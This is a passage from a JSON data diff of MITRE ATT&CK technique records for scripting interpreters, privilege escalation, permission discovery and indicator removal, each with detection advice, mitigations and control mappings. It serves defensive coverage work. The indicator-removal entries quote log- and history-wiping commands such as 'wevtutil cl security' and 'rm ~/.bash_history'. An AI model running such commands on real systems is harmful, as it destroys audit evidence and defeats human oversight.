blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1059.005", + "name": "Command and Scripting Interpreter: Visual Basic", + "url": "https://attack.mitre.org/techniques/T1059/005", + "description": "Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)\n\nDerivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)\n\nAdversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.", + "detection": "Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent.", + "mitigations": [ + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + } + ] + }, + { + "tid": "T1059.006", + "name": "Command and Scripting Interpreter: Python", + "url": "https://attack.mitre.org/techniques/T1059/006", + "description": "Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.\n\nPython comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.", + "detection": "Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.", + "mitigations": [ + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1033", + "name": "Limit Software Installation", + "description": "Block users or groups from installing unapproved software.", + "url": "https://attack.mitre.org/mitigations/M1033" + } + ] + }, + { + "tid": "T1059.007", + "name": "Command and Scripting Interpreter: JavaScript", + "url": "https://attack.mitre.org/techniques/T1059/007", + "description": "Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)\n\nJScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)\n\nJavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)\n\nAdversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).", + "detection": "Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.\n\nMonitor for execution of JXA through osascript and usage of OSAScript API that may be related to other suspicious behavior occurring on the system.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + } + ] + }, + { + "tid": "T1059.008", + "name": "Command and Scripting Interpreter: Network Device CLI", + "url": "https://attack.mitre.org/techniques/T1059/008", + "description": "Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. \n\nScripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004).\n\nAdversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution)", + "detection": "Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.(Citation: Cisco IOS Software Integrity Assurance - Command History)\n\nConsider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + } + ], + "cumulative_score": 3.4913142857142856, + "adjusted_score": 3.4913142857142856, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "2.3,2.5,2.7,4.1,4.7,4.8,5.3,5.4,6.1,6.2,6.8,9.3,9.6,9.7,10.1,10.2,10.7,13.2,13.7,18.3,18.5,16.10" + ], + "nist_controls": [ + "AC-17", + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CA-7", + "CA-8", + "CM-11", + "CM-2", + "CM-5", + "CM-6", + "CM-7", + "CM-8", + "IA-2", + "IA-8", + "IA-9", + "RA-5", + "SC-18", + "SI-10", + "SI-16", + "SI-2", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1068", + "name": "Exploitation for Privilege Escalation", + "description": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.\n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.\n\nAdversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).", + "url": "https://attack.mitre.org/techniques/T1068", + "tactics": [ + "Privilege Escalation" + ], + "detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery. Consider monitoring for the presence or loading (ex: Sysmon Event ID 6) of known vulnerable drivers that adversaries may drop and exploit to execute code in kernel mode.(Citation: Microsoft Driver Block Rules)\n\nHigher privileges are often necessary to perform additional actions such as some methods of [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges.", + "platforms": [ + "Containers", + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Driver: Driver Load" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + }, + { + "mid": "M1019", + "name": "Threat Intelligence Program", + "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.", + "url": "https://attack.mitre.org/mitigations/M1019" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ], + "cumulative_score": 1.2894131544342855, + "adjusted_score": 1.2894131544342855, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "7.1,7.2,7.3,7.4,7.5,10.5,18.3,18.5" + ], + "nist_controls": [ + "AC-2", + "AC-4", + "AC-6", + "CA-7", + "CA-8", + "CM-2", + "CM-6", + "CM-7", + "CM-8", + "RA-10", + "RA-5", + "SC-18", + "SC-2", + "SC-26", + "SC-29", + "SC-3", + "SC-30", + "SC-35", + "SC-39", + "SC-7", + "SI-2", + "SI-3", + "SI-4", + "SI-5", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": true + }, + { + "tid": "T1069", + "name": "Permission Groups Discovery", + "description": "Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.", + "url": "https://attack.mitre.org/techniques/T1069", + "tactics": [ + "Discovery" + ], + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). Monitor container logs for commands and/or API calls related to listing permissions for pods and nodes, such as kubectl auth can-i.(Citation: K8s Authorization Overview)", + "platforms": [ + "Azure AD", + "Containers", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "data_sources": [ + "Application Log: Application Log Content", + "Command: Command Execution", + "Group: Group Enumeration", + "Group: Group Metadata", + "Pod: Pod Metadata", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1069.001", + "name": "Permission Groups Discovery: Local Groups", + "url": "https://attack.mitre.org/techniques/T1069/001", + "description": "Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n\nCommands such as net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility, dscl . -list /Groups on macOS, and groups on Linux can list local groups.", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "mitigations": [] + }, + { + "tid": "T1069.002", + "name": "Permission Groups Discovery: Domain Groups", + "url": "https://attack.mitre.org/techniques/T1069/002", + "description": "Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n\nCommands such as net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain-level groups.", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "mitigations": [] + }, + { + "tid": "T1069.003", + "name": "Permission Groups Discovery: Cloud Groups", + "url": "https://attack.mitre.org/techniques/T1069/003", + "description": "Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.\n\nWith authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).\n\nAzure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google (Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation).\n\nAdversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.", + "mitigations": [] + } + ], + "mitigations": [], + "cumulative_score": 0.3765899264361905, + "adjusted_score": 0.3765899264361905, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1070", + "name": "Indicator Removal on Host", + "description": "Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1552/003) and /var/log/*.\n\nThese actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.", + "url": "https://attack.mitre.org/techniques/T1070", + "tactics": [ + "Defense Evasion" + ], + "detection": "File system monitoring may be used to detect improper deletion or modification of indicator files. Events not stored on the file system may require different detection mechanisms.", + "platforms": [ + "Containers", + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Deletion", + "File: File Metadata", + "File: File Modification", + "Network Traffic: Network Traffic Content", + "Process: OS API Execution", + "Process: Process Creation", + "User Account: User Account Authentication", + "Windows Registry: Windows Registry Key Deletion", + "Windows Registry: Windows Registry Key Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1070.001", + "name": "Indicator Removal on Host: Clear Windows Event Logs", + "url": "https://attack.mitre.org/techniques/T1070/001", + "description": "Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.\n\nThe event logs can be cleared with the following utility commands:\n\n* wevtutil cl system\n* wevtutil cl application\n* wevtutil cl security\n\nThese logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "detection": "Deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft Clear-EventLog)) may also generate an alterable event (Event ID 1102: \"The audit log was cleared\").", + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1029", + "name": "Remote Data Storage", + "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.", + "url": "https://attack.mitre.org/mitigations/M1029" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1070.002", + "name": "Indicator Removal on Host: Clear Linux or Mac System Logs", + "url": "https://attack.mitre.org/techniques/T1070/002", + "description": "Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/ directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)\n\n* /var/log/messages:: General and system-related messages\n* /var/log/secure or /var/log/auth.log: Authentication logs\n* /var/log/utmp or /var/log/wtmp: Login records\n* /var/log/kern.log: Kernel logs\n* /var/log/cron.log: Crond logs\n* /var/log/maillog: Mail server logs\n* /var/log/httpd/: Web server access and error logs\n", + "detection": "File system monitoring may be used to detect improper deletion or modification of indicator files. Also monitor for suspicious processes interacting with log files.", + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1029", + "name": "Remote Data Storage", + "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.", + "url": "https://attack.mitre.org/mitigations/M1029" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1070.003", + "name": "Indicator Removal on Host: Clear Command History", + "url": "https://attack.mitre.org/techniques/T1070/003", + "description": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.\n\nOn Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.\n\nAdversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history.\n\nOn Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.\n\nThe PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)\n\nAdversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)", + "detection": "User authentication, especially via remote terminal services like SSH, without new entries in that user's ~/.bash_history is suspicious. Additionally, the removal/clearing of the ~/.bash_history file can be an indicator of suspicious activity.\n\nMonitor for suspicious modifications or deletion of ConsoleHost_history.txt and use of the Clear-History command.", + "mitigations": [ + { + "mid": "M1039", + "name": "Environment Variable Permissions", + "description": "Prevent modification of environment variables by unauthorized users and groups.", + "url": "https://attack.mitre.org/mitigations/M1039" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1070.004", + "name": "Indicator Removal on Host: File Deletion", + "url": "https://attack.mitre.org/techniques/T1070/004", + "description": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)", + "detection": "It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.", + "mitigations": [] + }, + { + "tid": "T1070.005", + "name": "Indicator Removal on Host: Network Share Connection Removal", + "url": "https://attack.mitre.org/techniques/T1070/005", + "description": "Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the net use \\\\system\\share /delete command. (Citation: Technet Net Use)", + "detection": "Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of net use commands associated with establishing and removing remote shares over SMB, including following best practices for detection of [Windows Admin Shares](https://attack.mitre.org/techniques/T1077). SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.", + "mitigations": [] + }, + { + "tid": "T1070.006", + "name": "Indicator Removal on Host: Timestomp", + "url": "https://attack.mitre.org/techniques/T1070/006", + "description": "Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.\n\nTimestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)", + "detection": "Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.", + "mitigations": [] + } + ], + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1029", + "name": "Remote Data Storage", + "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.", + "url": "https://attack.mitre.org/mitigations/M1029" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting 